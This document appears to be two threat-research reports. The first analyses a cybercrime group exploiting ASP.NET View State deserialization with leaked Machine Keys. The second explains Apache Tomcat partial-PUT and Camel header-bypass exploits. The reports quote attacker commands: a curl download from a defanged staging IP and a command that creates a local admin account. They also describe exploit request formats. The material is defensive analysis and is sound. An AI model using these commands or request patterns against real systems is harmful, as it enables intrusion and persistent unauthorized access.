The IAB used these leaked keys to sign malicious payloads that provide unauthorized access to targeted servers, in a technique called ASP.NET View State deserialization. This technique enabled the IAB to execute malicious payloads directly in server memory, minimizing their on-disk presence and leaving few forensic artifacts, making detection more challenging.

We attribute the temporary group TGR-CRI-0045, with medium confidence, to Gold Melody (aka UNC961, Prophet Spider). This assessment is based on overlaps in the following:

  • Indicators of compromise (IoCs)
  • Tactics, techniques and procedures (TTPs)
  • Victimology

This report also analyzes TGR-CRI-0045's infrastructure, as well as the tooling it used to gather information about other systems on the network and maintain access to the exploited systems. The tooling appears to be under active development.

The earliest evidence of exploitation and tool deployment was in October 2024, with a significant increase in activity between late January and March 2025. This surge included deploying post-exploitation tools such as open-source port scanners and custom-built utilities for persistence (maintaining access) and privilege escalation (gaining higher-level access).

We identified or responded to incidents at around a dozen organizations impacted by this threat. In most cases, we identified exposed Machine Keys as the root cause. Therefore, we strongly recommend that organizations review Microsoft’s guidance on identifying and remediating compromised Machine Keys for ASP.NET Internet Information Services (IIS) sites in their environment.

Palo Alto Networks customers are better protected from the tools discussed in this article through the following products and services:

  • The Advanced WildFire machine-learning models and analysis techniques have been reviewed and updated in light of the indicators shared in this research.
  • Advanced URL Filtering and Advanced DNS Security identify known domains and URLs associated with this activity as malicious.
  • The Cortex XDR and XSIAM IIS Protection module features capabilities to both detect and prevent View State deserialization as discussed in this article.

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics Microsoft, Web Shells, Golang

Technical Analysis

How Managed Threat Hunting Discovered TGR-CRI-0045: A Surge in Exploitation

Between Jan. 30 and Feb. 2, 2025, we responded to web server intrusions in two customer environments. In both cases, the intrusions involved command shell execution originating from an IIS worker process (w3wp.exe). These intrusions exhibited the following common characteristics:

  • cmd.exe invocation using stdout and stderr output redirection: cmd /c your_command_here 2>&1
  • Staging directory: C:\Windows\Temp\111t
  • File retrieved via curl from: hxxp://195.123.240[.]233:443/atm

Broader Investigation

Unexpectedly, the investigation of affected endpoints revealed no recently uploaded web shells. However, expanding the investigation revealed the same cmd.exe invocation and staging directory misuse in other tenants' hands-on-keyboard intrusions.

Telemetry confirmed the attacker executed commands loading managed .NET assemblies (C# code) directly into memory (reflective loading). This exploitation targeted the View State, an internal parameter within ASP.NET sites running on Microsoft IIS, via deserialization of a malicious payload. Deserialization is the process of converting data encoded for transit or storage into internal application state. As MSTIC reported, this exploitation was likely enabled by the victims' use of static, exposed Machine Keys within their applications.

Public reporting on financially motivated threat actors abusing ViewState deserialisation is limited. This report seeks to address this gap by providing insights into the attackers' trade craft and contributing to the growing understanding of .NET deserialization exploitation. Our goal is to empower defenders to effectively respond to these threats.

How TGR-CRI-0045 Exploited Victim Servers

IIS and ASP.NET View State Exploitation Primer

Understanding TGR-CRI-0045's access requires explaining the roles of IIS, ASP.NET, View State and how compromised key material enables remote code execution. IIS is a web server supporting various web application technologies, including ASP.NET. This framework allows developers to create dynamic, server-side applications using .NET languages like C# and VB.NET.

ASP.NET websites use View State to manage interactions between a user's browser and the server. View State maintains the state of frontend controls (e.g., checkboxes and input fields) between requests, storing this information in a hidden HTTP parameter named __VIEWSTATE, included in all requests. This parameter is vulnerable to various .NET deserialization techniques that can enable remote code execution if the attacker knows the key used to protect it.

Machine Keys, consisting of a ValidationKey (for integrity) and an optional DecryptionKey, protect ASP.NET View States from manipulation by default. However, attackers can leverage publicly available lists of leaked Machine Keys that are often present on production sites due to code reuse (referenced at the end of this article).

Attackers can also extract Machine Keys directly from running servers. With a valid set of Machine Keys, an attacker can craft a malicious deserialization payload, target a vulnerable server and execute arbitrary code within the context of the IIS worker process.

The potential scope of this attack is significant. View States are transmitted regardless of the specific site or application running on ASP.NET, even if disabled for a particular component. Any IIS server running an ASP.NET site with compromised Machine Keys is likely vulnerable. For a detailed explanation of how threat actors store and access Machine Keys, we highly recommend this Zeroed.tech blog post.

Generating and Executing View State Payloads

TGR-CRI-0045 likely used tools like ysoserial.net — an open-source .NET deserialization payload generator — and its View State plugin to build malicious deserialization payloads that:

  • Bypassed View State protection using pre-exposed Machine Keys to create valid cryptographic signatures, bypassing built-in View State protections. (Compromised sites often had web.config files containing Machine Keys that were present on known denylists)
  • Used the XamlAssemblyLoadFromFile gadget, a deserialization gadget relying on XAML-formatted data to:
    • Trigger malicious deserialization
    • Load and execute a .NET assembly in memory from a Base64-encoded gzip stream contained in the __VIEWSTATE parameter

Loaded .NET assemblies have the same lifecycle as the delivering HTTP request. The attacker launches an exploit payload, and the target server processes it. The payload executes, using input parameters bundled within the same request and returns output to the originating request via the HTTP response.

Once processed, the payload cannot be re-used. This “single-shot” exploit requires a separate attempt for each command, resulting in a 1:1 ratio of exploit attempts to command executions. Figure 1 below shows this process.

Diagram depicting an HTTP request and response process. It includes icons representing settings, a user, a server, and a document. Text boxes display elements of the process such as URLs and HTTP methods like GET and POST, along with responses.
Figure 1. Assessed flow of the operator’s actions to build a payload, and how a response is sent back to them.

Recovering and Analyzing TGR-CRI-0045 IIS Modules

In compromised environments, we identified subsets of the following five .NET assemblies loaded into memory following successful View State exploitation:

  • Cmd /c: We identified three sub-variants, each using different HTTP parameters to pass a command to the system's command shell. This allowed the attacker to execute arbitrary commands on the server.
  • File upload: This allowed the attacker to upload files to the server by specifying a target file path and a byte buffer containing the file's contents.
  • Winner: This was likely an exploitation check, reporting back u a win to the attacker, confirming successful exploitation.
  • File download: (Unrecovered) Based on imported functions, this module appears to be a downloader, enabling the attacker to retrieve sensitive data from the compromised server.
  • Reflective loader: (Unrecovered) Based on imported functions, this module appears to be a reflective loader, allowing the attacker to dynamically load and execute additional .NET assemblies in memory without writing them to disk.

The recovered assemblies share common data handling characteristics. They appear to use a simple single-character XOR key x to decrypt payloads embedded within HTTP parameters.

The assemblies also appear to call httpContext.response.Flush() followed by httpContext.response.End() to terminate HTTP responses. This likely reduces the amount of forensic data generated when ASP.NET fails to correctly deserialize the malicious payloads, making detection and incident response more challenging.

Assembly name E — the default ysoserial.net ExploitClass name — occurs most frequently. To avoid naming conflicts, the attacker renamed some modules (e.g., Dw and d).

Figures 2-6 below show the source code of the recovered modules, which were likely written as C# .cs files. Compilation — transforming source code into executable code — varies depending on the ysoserial.net gadget used. We most frequently observed the XamlAssemblyLoadFromFile gadget, which compiles the .NET assembly on the attacker's system during exploitation and transmits it to the target server for in-memory execution.

Cmd Payloads

Screenshot of a code snippet in a text editor with syntax highlighting. The code involves handling an exception, initiating a process to execute 'cmd.exe', redirecting standard input and output, and clearing HTTP context. The editor interface uses dark mode and displays line numbers beside the code.
Figure 2. Source of the cmd /c variant payload with sec-fetch-mode headers.
Screenshot of computer code in a text editor, featuring functions and commands related to HTTP context and system processes, including references to error handling and fetching command-line arguments.
Figure 3. Source of the cmd /c variant with cmd header.
Screenshot of computer code with syntax highlighting. The code includes functions and comments related to error handling and HTTP context operations.
Figure 4. Source of the cmd /c variant with __Value parameter and single character XOR encryption.

File Upload

Screenshot of a computer code editor displaying code with various functions, including array operations and HTTP context handling. The code has syntax highlighting and is displayed in dark mode.
Figure 5. Source of the file upload assembly that takes a path and file contents in __Fvalue and __Bvalue parameters, respectively.

Exploit Checker

Screenshot of computer code in an editor with syntax highlighting and using HttpContext.
Figure 6. Source of the exploit checker assembly that simply writes back to an operator u a win to indicate that exploitation was successful.

Operational Use of Assemblies

Between October 2024 and January 2025, the threat actor’s activity primarily focused on exploiting systems, deploying modules — like the exploit checker — and performing basic shell reconnaissance.

Hands-on-Keyboard Post-Exploitation

Post-exploitation activity has primarily involved reconnaissance of the compromised host and surrounding network. We had observed no lateral movement as of early June.

A consistent characteristic across all observed intrusions was TGR-CRI-0045 using C:\Windows\Temp\111t as a staging directory for tools and data. In a few isolated instances, we observed the threat actor interacting with the C:\Windows\Temp\gen_py directory but found no evidence of them storing tools or exfiltrated data there.

Local Privilege Escalation and Persistence

The threat actor primarily achieved local privilege escalation using a custom C# binary named updf. This name was likely used to disguise the file as the PDF editor UPDF.

The updf binary appears to be under active development, based on partially implemented features in its codebase. It uses the GodPotato exploit, which misuses Windows named pipes to impersonate a privileged service (e.g., epmapper) and obtain SYSTEM-level access.

While updf can execute commands with SYSTEM privileges, it's most commonly used to create a new local user and add it to the local administrators group:

  • c:\windows\temp\111t\updf.exe -nadm 'support:Sup0rt_1!admin'

In one instance, TGR-CRI-0045 exported web.config files (ASP.NET configuration files) and modified a specific page's settings to <allow users="*"/>, potentially bypassing authentication for alternate server access. We couldn't confirm whether this modified page was an existing vulnerable page that was re-exploitable by TGR-CRI-0045, or a disk-based web shell.

Download of Staged Binary

Most observed intrusions involved using wget or curl to download an ELF binary named atm. If the attacker used curl, it was likely pre-existing on the hosts. If they used wget.exe, it was likely uploaded to the target servers by executing the file upload payload. This atm binary might support malicious activities on Linux servers, should lateral movement occur. The following is an example of a curl command used to download the atm binary:

  • curl hxxp://195.123.240[.]233:443/atm

TXPortMap

TGR-CRI-0045 used TxPortMap — a Golang port scanner and banner grabber — executed as txp.exe or txpm.exe. They did so to identify internal servers accessible from the initially compromised host (the beachhead). This allowed the attacker to map out the internal network and identify potential exploitation targets.

Reconnaissance Activities

Over a five-minute period, the threat actor performed local and network reconnaissance via the command shell assembly, using the following commands:

Table 1 shows the reconnaissance commands.

Command Description
tasklist Lists all running processes on the system
ipconfig /all Displays the system's network configuration, including IP address, domain name server (DNS) servers and media access control (MAC) address
quser Displays information about users that are logged in 
whoami /all Displays the current user's identity and group memberships
nltest /domain_trusts Enumerates domain trusts
net user Lists local user accounts
systeminfo Displays detailed system information, including OS version and hardware details
dir <user directories> Lists the files and directories in user directories

Table 1. Threat actor’s reconnaissance commands.

Renaming Uploaded Executables for Defense Evasion

The file upload assembly sometimes uploaded executables with one-, two- or three-character filenames. It’s unclear whether this was a limitation of the assembly itself or a deliberate evasion technique by the threat actor to upload files without extensions. The attacker then used the command shell assembly to rename these files with valid extensions within the staging directory, likely to make the files appear less suspicious.

Examples of the commands used to rename the files:

  • "cmd.exe" /c move c:\windows\temp\111t\tx2 c:\windows\temp\111t\txp.exe 2>&1
  • "cmd.exe" /c move c:\windows\temp\111t\tx c:\windows\temp\111t\txpm.exe 2>&1
  • "cmd.exe" /c move c:\windows\temp\111t\w c:\windows\temp\111t\wget.exe 2>&1

After executing their tools and reconnaissance, the threat actor deleted any remaining on-disk tools and the 111t directory.

Attribution and Targeting

Based on overlaps in IoCs, TTPs and victimology, we assess with medium confidence that TGR-CRI-0045 is linked to Gold Melody.

TGR-CRI-0045 has targeted organizations in Europe and the U.S. The group seems to follow an opportunistic approach that is consistent with their attack vector. Since the beginning of the identified activity, the group has targeted organizations from the following industries, most of them based in the U.S.:

  • Securities and investment services
  • Manufacturing - building supplies
  • Manufacturing - clay refractories
  • Manufacturing - surgical/medical instruments
  • Wholesale and retail
  • High tech
  • Transportation and logistics
  • Prepackaged software services
  • Data processing and preparation
  • Financial services
  • Used goods/merchandise resalers
  • Custom computer programming services

Implications of Cybercrime Adoption of In-Memory IIS Tradecraft and Key Takeaways for Blue Teams

Stealthier Access and Longer Dwell Times

In-memory IIS tradecraft significantly hinders detection. Without proper telemetry, View State deserialization attacks are virtually invisible. Remediation typically occurs only when new Machine Keys are generated or the server is decommissioned. This allows threat actors, particularly IABs, to maintain long-term, low-footprint access to a pool of compromised systems.

Telemetry for POST Requests: Covering a Possible Weakness

Although View State deserialization payloads can be delivered via a URI parameter in a GET request, attackers typically include the __VIEWSTATE parameter within a POST request. Due to their size and potential sensitivity, POST requests are rarely logged by IIS servers, proxies, load balancers or security appliances.

Consider implementing solutions that conditionally filter and log POST requests. Options include the following:

  • Custom logging rules
  • Web observability frameworks
  • Endpoint detection and response agents
  • Network security appliances

A Possible Detection Avenue: Windows Event Logging

Windows might log View State deserialization failures as Event ID 1316 in the ASP.NET event log. Review these logs and check for malicious binaries in failed View State payloads. View States containing binaries or encrypted data (when View State encryption is disabled) are highly suspicious.

Single-Shot Exploits: A Limited Approach

TGR-CRI-0045 uses a simplistic approach to View State exploitation, loading a single, stateless assembly directly. Each command execution requires re-exploitation and re-uploading the assembly (e.g., running the file upload assembly multiple times). The same applies to executing a new directory listing or a new process. The assembly, parameters and exploit code are submitted and executed, and the results are returned through a single request. This single-shot approach limits the attacker's ability to interact with the compromised system.

Even if TGR-CRI-0045 does not deploy a persistent web shell (backed by disk or memory) via View State exploitation, defenders need to be aware of the following:

  • Each exploit is an opportunity
    • Each exploit attempt provides attackers with the opportunity to execute a payload that is possibly invisible to existing security tooling and monitoring
  • The absence of a web shell doesn't mean there’s no breach
    • A lack of a web shell does not indicate that the server has not been exploited
  • Re-exploitation is required
    • TGR-CRI-0045 must exploit the server each time they wish to execute a payload, unless they load a module that is persistent between requests
  • Stateful exploitation is possible
    • Although TGR-CRI-0045 is deploying stateless modules, there are documented cases of threat actors deploying stateful IIS post-exploitation .NET assemblies. These rely on data stored in ASP.NET and .NET variables that are accessible to the web processing pipeline and persistent between requests. CrowdStrike’s report on IceApple is an example of one such framework.

MITRE ATT&CK Techniques

  • T1036.005 – Masquerading: Match Legitimate Name or Location (updf binary)
  • T1036.010 – Masquerading: Masquerade Account Name
  • T1046 – Network service discovery (TxPortMap)
  • T1059.003 – Command and Scripting Interpreter: Windows Command Shell (cmd.exe)
  • T1071.001 – Application Layer Protocol: Web Protocols (HTTP View State)
  • T1082 – System Information Discovery (systeminfo, ipconfig)
  • T1105 – Ingress tool transfer (wget, curl)
  • T1134.001 – Access Token Manipulation: Token Impersonation/Theft (GodPotato exploit in updf)
  • T1136.001 – Create account: Local Account (updf)
  • T1190 – Exploit public-facing application (View State deserialization)
  • T1217 – Browser Information Discovery
  • T1505.003 – Web shell (Potential web.config modification)
  • T1572 – Protocol tunneling (If used, based on imported functions in the unrecovered file download module)
  • T1587.001 – Malware

Remediation and Hardening Guidance

Machine Keys

IIS Machine Keys are fundamental cryptographic components used to authenticate and encrypt client-server data. They are essential for View State deserialization exploits.

If you suspect a View State deserialization exploit, check your IIS application for the following:

  • Having no View State message authentication code (MAC) enabled
  • Using a compromised Machine Key
  • Having had its Machine Key stolen

We provide guidance for four possible cases below:

  • If View State MAC signing is disabled, enable it after testing application stability
  • If View State MAC signing is enabled and uses static Machine Keys, consider the keys compromised. Remediate them following guidance from Microsoft and Zeroed.Tech.
  • If View State MAC signing is enabled and uses static Machine Keys found in known compromised lists (e.g., Blacklist3r): Reset the keys following the guidance from Microsoft above, ensuring the new key isn't on this denylist.
  • If View State MAC signing is enabled and uses dynamic Machine Keys, consider the keys compromised and regenerate them in IIS Server Manager.

We strongly recommend reviewing Microsoft’s guidance on remediation for this topic.

Conclusion

This investigation reveals how TGR-CRI-0045 leverages in-memory IIS techniques for persistent access. Exploiting ASP.NET View State deserialization vulnerabilities via exposed Machine Keys allows minimal on-disk presence and enables long-term access.

The group's opportunistic targeting and ongoing tool development highlight the need for organizations to prioritize identifying and remediating compromised Machine Keys, as outlined by Microsoft. The single-shot nature of the exploit and limitations of traditional telemetry show the need for conditional POST request logging and careful ASP.NET event log analysis. These measures aid detection and response when endpoint solutions lack visibility into such attacks

Palo Alto Networks Protection and Mitigation

Palo Alto Networks customers are better protected from the threats discussed above through the following products:

XDR and XSIAM IIS Protection

The Cortex XDR and XSIAM IIS Protection module features capabilities to both detect and prevent View State deserialization as discussed in this article. This module is enabled by default.

If you think you may have been compromised or have an urgent matter, get in touch with the Unit 42 Incident Response team or call:

  • North America: Toll Free: +1 (866) 486-4842 (866.4.UNIT42)
  • UK: +44.20.3743.3660
  • Europe and Middle East: +31.20.299.3130
  • Asia: +65.6983.8730
  • Japan: +81.50.1790.0200
  • Australia: +61.2.4062.7950
  • India: 00080005045107

Palo Alto Networks has shared these findings with our fellow Cyber Threat Alliance (CTA) members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. Learn more about the Cyber Threat Alliance.

Indicators of Compromise

Reflective .NET assembly hashes:

  • 106506ebc7156be116fe5d2a4d662917ddbbfb286007b6ee7a2b01c9536b1ee4
  • 87bd7e24af5f10fe1e01cfa640ce26e9160b0e0e13488d7ee655e83118d16697
  • 55656f7b2817087183ceedeb4d9b78d3abee02409666bffbe180d6ea87ee20fb
  • 18a90b3702776b23f87738b26002e013301f60d9801d83985a57664b133cadd1
  • d5d0772cb90d54ac3e3093c1ea9fcd7b878663f7ddd1f96efea0725ce47d46d5
  • b3c085672ac34f1b738879096af5fcd748953116e319367e6e371034366eaeca
  • File sizes: Various
  • File types: Executables (DLL)
  • File description: Hashes of compiled assemblies observed
  • Run method: Loaded by IIS upon deserialization

Post-exploitation tooling dropped to disk:

  • d4bfaf3fd3d3b670f585114b4619aaf9b10173c5b1e92d42be0611b6a9b1eff2
  • c1f66cadc1941b566e2edad0d1f288c93bf060eef383c79638306638b6cefdf8
  • File types: Executables
  • File description: TxPortMap named txpm.exe or txp.exe
  • Run method: cmd /c
  • 52a72f899991506d2b1df958dd8736f7baa26592d664b771c3c3dbaef8d3114a
  • d3767be11d9b211e74645bf434c9a5974b421cb96ec40d856f4b232a5ef9e56d
  • File types: Executables
  • File description: .NET executables named updf.exe or up that uses the GodPotato privilege escalation technique to elevate and create a new local administrator or run an instance of cmd /c.
  • Run method: cmd /c
  • f368ec59fb970cc23f955f127016594e2c72de168c776ae8a3f9c21681860e9c
  • File type: ELF
  • File description: Allows a user to execute commands or binaries as a root user on Linux hosts. Downloaded via curl.

Exploitation IP addresses:

  • 67.43.234[.]96
  • 213.252.232[.]237
  • 98.159.108[.]69
  • 190.211.254[.]95
  • 109.176.229[.]89
  • 169.150.198[.]91
  • 194.5.82[.]11
  • 138.199.21[.]243
  • 194.114.136[.]95

Exploitation payloads containing malicious __VIEWSTATE parameters were observed from the following IP addresses in October 2024-February 2025. HTTP/s traffic from these addresses targeting IIS servers should be interrogated.

Infrastructure staging post-exploitation tooling:

  • 195.123.240[.]233

Between January and February 2025, the threat actor pulled tooling down from this address via curl on Windows.

Additional Resources

Apache Under the Lens: Tomcat’s Partial PUT and Camel’s Header Hijack

Posted on by Haozhe Zhang

Executive Summary

In March 2025, Apache disclosed CVE-2025-24813, a vulnerability impacting Apache Tomcat. This is a widely used platform that allows Apache web servers to run Java-based web applications. The flaw allows remote code execution, affecting Apache Tomcat versions 9.0.0.M1 to 9.0.98, 10.1.0-M1 to 10.1.34 and 11.0.0-M1 to 11.0.2.

The same month, Apache revealed two additional vulnerabilities in Apache Camel, a message routing middleware framework. These vulnerabilities are CVE-2025-27636 and CVE-2025-29891, two flaws that allow remote code execution, affecting Apache Camel versions 4.10.0 to 4.10.1, 4.8.0 to 4.8.4 and 3.10.0 to 3.22.3.

These vulnerabilities are significant because millions of developers rely on the platform provided by the Apache Foundation. Successful exploitation of these vulnerabilities can allow attackers to execute arbitrary code with Tomcat/Camel privileges.

Apache has released patches, and researchers quickly published proof‑of‑concept (PoC) exploits. Scans and probes for vulnerable servers were seen in the wild shortly after the disclosures. We have confirmed the potential for remote code execution from these three vulnerabilities.

Palo Alto Networks blocked 125,856 probes/scans/exploit attempts related to these vulnerabilities in March 2025. We advise organizations to apply patches promptly.

Palo Alto Networks customers are better protected through the following products and services:

If you think you might have been compromised or have an urgent matter, contact the Unit 42 Incident Response team.

Related Unit 42 Topics and Vulnerabilities Discussed Vulnerabilities, CVE-2025-24813, CVE-2025-27636, CVE-2025-29891

CVE-2025-24813: Apache Tomcat

Vulnerability Overview

CVE-2025-24813 is a vulnerability in Apache Tomcat's partial PUT feature that can allow attackers to overwrite serialized session files on disk, leading to arbitrary code execution.

This vulnerability arises when Tomcat is configured to persist HTTP session data, because unpatched Tomcat systems improperly handle partial PUT requests containing the Content-Range header.

Partial PUT

The term “partial PUT” refers to an HTTP PUT request that updates only part of a resource instead of replacing it entirely. When supported, partial PUT typically uses the Content-Range header in an HTTP request to specify which part of the resource should be modified.

This allows clients to upload or overwrite resource segments in chunks. Partial PUT can be exploited to perform incremental file uploads, overwrite specific parts of files, or bypass certain security checks if not properly handled.

Session Persistence Feature in Apache Tomcat

Apache Tomcat's HTTP session manager includes a session persistence feature. This feature saves session data to a file or database when the server is shut down, and it reloads this cached data when the server is restarted. Session data contains information such as user login status and preferences, and this feature helps preserve a user's session data across server restarts.

Tomcat encodes this saved session data as a stream of bytes using a process called serialization and stores the serialized data in the local file system. It serializes all session attributes stored in the HttpSession object. This includes any data your web application explicitly places in the session using session.setAttribute(). The information is typically stored somewhere under $TOMCAT_HOME/webapps/ROOT/.

However, the serialized session data is stored in the same directory used by Tomcat's executePartialPut function. Users can craft HTTP requests to control the session ID and the filename of the cached data in this directory. This could allow an attacker to intentionally set the session ID to match the cached filename of malicious code previously saved to the cache. This can result in deserialization of the cached file, triggering the embedded malicious code.

Preconditions

The Content-Range header is often used with partial updates. This header indicates the request body contains a portion of the resource rather than the entire resource. If an HTTP PUT request contains a Content-Range header, Tomcat saves the content (body) of the PUT request to the cache location. The following code snippet shows that Tomcat saves the data from an HTTP PUT request that contains content.

A vulnerable Tomcat configuration must have two preconditions to exploit this vulnerability:

  1. A disabled readonly parameter in the Tomcat configuration file at $TOMCAT_HOME/conf/web.xml. The section of web.xml that contains a disabled readonly parameter follows.

Exploiting the Vulnerability

We tested the exploitation of CVE-2025-24813 in March 2025. Exploiting this vulnerability consists of two steps:

  • First, stage the payload by ending it as a file through an HTTP PUT request with content range and a self-defined filename in the URL. This file contains serialized malicious code for later deserialization.
  • Next, trigger the exploit by sending an additional HTTP GET request containing a cookie consisting of JSESSIONID= immediately followed by the self-defined filename prefixed by a period. In this case, the cookie line would read Cookie: "JSESSIONID=.[filename]" as Figure 1 below shows. This will trigger deserialization of the cache to run the malicious code.
Flowchart depicting a two-step cyber attack process. In Step 1, an HTTP request labeled 'PUT /filename.session' with 'Content-Range: bytes 0-5/100' is sent to a server. In Step 2, an attacker sends an HTTP request labeled 'GET /' with 'Cookie: JSESSIONID=_filename' to the server. Arrows indicate the direction of communication between stages and server.
Figure 1. Two steps of the exploit.

Step 1: Stage the Serialized Malicious Code

This first step consists of sending a file of serialized malicious code as the body of an HTTP PUT request. Apache Tomcat will cache the malicious code as a session file on the local file system, since the name of the file in the URI ends in .session as Figure 2 shows in the PUT header line.

Figure 2 shows the first step’s PUT request with gopan.session as a filename. The format of this HTTP PUT request from the traffic is: PUT /[filename].session HTTP/1.1

A screenshot of an HTTP PUT request with part of its header and file content shown. The header includes information about the host, connection type, and content length. A highlighted section indicates the file name "gopan.session" is sent as the content body of the request.
Figure 2. Payload in step 1.

Step 2: Trigger the Exploit

The second step consists of sending a follow-up HTTP GET request to trigger the exploit and run the malicious code. Figure 3 shows the HTTP GET request with the JSESSIONID cookie value used in the previous step. The format of this cookie is: Cookie: JSESSIONID=.[filename]

Screenshot of a computer terminal displaying HTTP requests and responses. The response shows an HTTP 500 error, and some of the cookie data refers to file names 'gopan' and 'gopan-family'.
Figure 3. Exploiting the vulnerability to run the payload previously sent in step 1.

The cookie value for this exploit uses a period (.) before the filename value of the JSESSIONID. This leading period will lead Tomcat to save the session file with the leading dot.

Source Code Analysis

How Tomcat Caches the PUT Body to a File

As Figure 4 shows, Tomcat first checks if the readonly flag is enabled in the configuration file. If so, Tomcat does not write any code to the cache, including the malicious code.

Flowchart detailing interactions between HttpServlet operations. It starts with 'doPut' handling a request and response, checking feasibility and range before deciding to execute 'executePartialPut' or 'write req, save the file'. Another branch shows 'replacePartialPut' handling a string request, creating a temporary file, and verifying the file object as well as writing the session to the file object.
Figure 4. Step one: From PUT to write a file.
  • If the readonly flag is not enabled, Tomcat will also check the Content‑Range field in the HTTP header
  • If the request lacks a Content‑Range header, Tomcat ends the process
  • If the request has a Content‑Range header, Tomcat saves the session data from the HTTP PUT request, in this case gopan.session, in two locations as shown in Figure 5
    • The first is saved as a normal cache file under $TOMCAT_HOME/webapps/ROOT/ without the leading period
    • The second is saved as a temporary file with a leading period under the work directory at $TOMCAT_HOME/work/Catalina/localhost/ROOT/
Screenshot of a directory structure in an IDE, highlighting the Apache Tomcat installation with files under the work directory. Root directory of Tomcat installation. Session file without leading period in file name stored as normal file under the current cache directory. Session file with leading period in file name stored as a temporary file under the work directory.
Figure 5. Cached session file.

Crucially, when Tomcat restores a session, it also loads the cached session file from the same work folder.

Figures 6 and 7 show code segments from the default Java servlet that Tomcat uses to load cached session files when restoring a session at java/org/apache/catalina/servlets/DefaultServlet.java. Comments in yellow describe actions taken by the code.

Screenshot of a Java program displaying code related to handling HTTP server requests and responses.
Figure 6. First code segment from Apache's default Java servlet used by Tomcat.
Screenshot showing a section of programming code, displayed in a text editor with syntax highlighting.
Figure 7. Second code segment from Apache's default Java servlet used by Tomcat.
How the Vulnerability Is Triggered by an HTTP Request

When Tomcat receives an HTTP request with a session ID, if session persistence is enabled in the configuration, it will try to find the session in memory. If Tomcat cannot find the session in memory, it restores the session from the saved cache file. At that point, Tomcat deserializes the session file, as shown in Figure 8.

Flowchart representing session management processes. It includes functions like findSession, swapIn, loadSessionFromStore, and load with details on steps like checking if session is in memory, loading from store, and deserializing content.
Figure 8. Step two: From sessionID to deserialization.

Figure 8 illustrates Tomcat’s session management flow. The code that locates sessions, loads them from disk and deserializes their contents is implemented in the following files:

  • java/org/apache/catalina/session/PersistentManagerBase.java
  • java/org/apache/catalina/Store.java
  • java/org/apache/catalina/session/FileStore.java

Figure 9 shows a code segment from java/org/apache/catalina/session/PersistentManagerBase.java that directs Tomcat to find a file for the session data, if the session data is not available in memory.

Screenshot of a computer code in Java. The code includes a method called findSession with comments explaining parts of the code logic related to checking session availability in memory and retrieving it from a file if not found.
Figure 9. Code segment from PersistentManagerBase.java to find session data as a file if not in memory.

Figures 10 and 11 show code segments from the same PersistentManagerBase.java file that illustrate how it loads the session data from a saved cache file.

Screenshot of computer code featuring syntax for session management and exception handling.
Figure 10. Code segment from PersistentManagerBase.java to load session from file (1 of 2).
Screenshot of a code snippet displaying a method named 'loadSessionFromStore'. The code includes exception handling and logging error messages.
Figure 11. Code segment from PersistentManagerBase.java to load session from file (2 of 2).

As Figure 11 shows, store.load(id) triggers deserialization, awakening the malicious code previously embedded in the file by the attacker. This results in arbitrary code execution.

Reviewing this source code first reveals how Tomcat saves session data from an HTTP PUT request, a process by which an attacker can store malicious code. This review also provides insight on how an exploit for the CVE-2025-24813 vulnerability can be triggered by a single follow-up HTTP GET request.

But Tomcat is not the only Apache software that we've seen exploit attempts for in the wild. We have also noted exploit attempts for two vulnerabilities in Apache Camel.

CVE-2025-27636 and CVE-2025-29891: Apache Camel

Apache Camel Overview

Apache Camel is an open-source integration framework that allows developers to connect different systems in a reliable and scalable manner. Using Camel, developers can define routing and mediation rules in a variety of domain-specific languages to integrate diverse systems and applications. Apache Camel supports a wide range of protocols and technologies.

Most Camel message handlers are provided as Java packages, allowing the developer to select which packages to include in their product.

Exploitation Details

Whether encrypted or unencrypted, HTTP is a common method for sending data across the internet. While Camel uses various types of HTTP components like Jetty and Netty, Camel ultimately routes the parsed HTTP messages back to its core components, known as camel-core, for further processing.

To facilitate data exchange between Camel and its HTTP components like Jetty and Netty, developers devised a method using key-value pairs to store important contextual information, such as the HTTP response code. Since the HTTP headers are used in processing, Camel also stores the HTTP headers within the same key-value pair. To avoid conflicts between internal contextual information and external data, Camel developers added a Camel prefix to all internal context keys and implemented a filter to prevent the external headers from causing issues (Figure 12).

Diagram showing two sections labeled HTTP Headers and Camel Headers, each containing examples of specific header names like User-Agent, Host, Accept, CamelExecCommandExecutable, and CamelHttpResponseCode.
Figure 12. Normal HTTP headers compared to Apache Camel HTTP headers.

However, since the filter operates on a case-sensitive basis, an attacker could potentially bypass it by altering the case of the headers.

Source Code Analysis

By default, Camel registers the default header filter handler. It asks the filter to ignore all header lines that start with Camel, camel and org.apache.camel. The code for this is at components/camel-http-base/src/main/java/org/apache/camel/http/base/HttpHeaderFilterStrategy.java, and Figure 13 shows the applicable segment.

Image of a code snippet named HttpHeaderFilterStrategy, showing methods related to filtering HTTP headers. Includes code comments and elements like filter conditions specifying camel case and domain names.
Figure 13. Code segment from HttpHeaderFilterStrategy.java to ignore specific header lines.

Camel enumerates HTTP request headers, runs the applyFilterToExternalHeaders function and writes the headers to an internal map using components/camel-http-common/src/main/java/org/apache/camel/http/common/DefaultHttpBinding.java as Figure 14 below shows.

Screenshot of a computer code snippet that includes code for reading HTTP headers in a servlet request, with comments and conditional statements.
Figure 14. Code segment from DefaultHttpBinding.java.

The header filtering logic does different matches based on Camel's configuration. By default, Camel only uses tryHeaderMatch to only check for the beginning of the header. This is done through core/camel-support/src/main/java/org/apache/camel/support/DefaultHeaderFilterStrategy.java as Figure 15 below shows.

Screenshot of code for handling HTTP header filters. Underlined in red and indicated by a red arrow is tryHeaderMatch.
Figure 15. Code segment from DefaultHeaderFilterStrategy.java showing tryHeaderMatch.

Assuming an attacker overrides the header CAmelExecCommandExecutable using a capital A in the word CAmel, and the developer is using the camel-exec package, camel-exec will read the value and execute it through components/camel-exec/src/main/java/org/apache/camel/component/exec/impl/DefaultExecBinding.java, as Figure 16 below shows.

Screenshot of code from the Apache Camel project featuring the DefaultExecBinding class, which includes method implementations and parameter handling related to command execution.
Figure 16. Code segment from DefaultExecBinding.java.

If a developer has set this endpoint to execute a benign executable, the attacker can replace the endpoint with a dangerous command, using a reverse shell. The attacker can potentially get a reverse shell through the remote command execution.

Telemetry

During March 2025, our telemetry had identified 125,856 scans, probes or exploit attempts originating from more than 70 countries for Tomcat vulnerability CVE-2025-24813 and Camel vulnerabilities CVE-2025-27636 and CVE-2025-29891. As our analysis of the trigger data in Figure 17 shows, the frequency of this activity surged immediately after these exploits were announced in mid-March 2025, reaching its peak within the first week.

The data further indicates the presence of both automated scanners and active exploits in the wild.

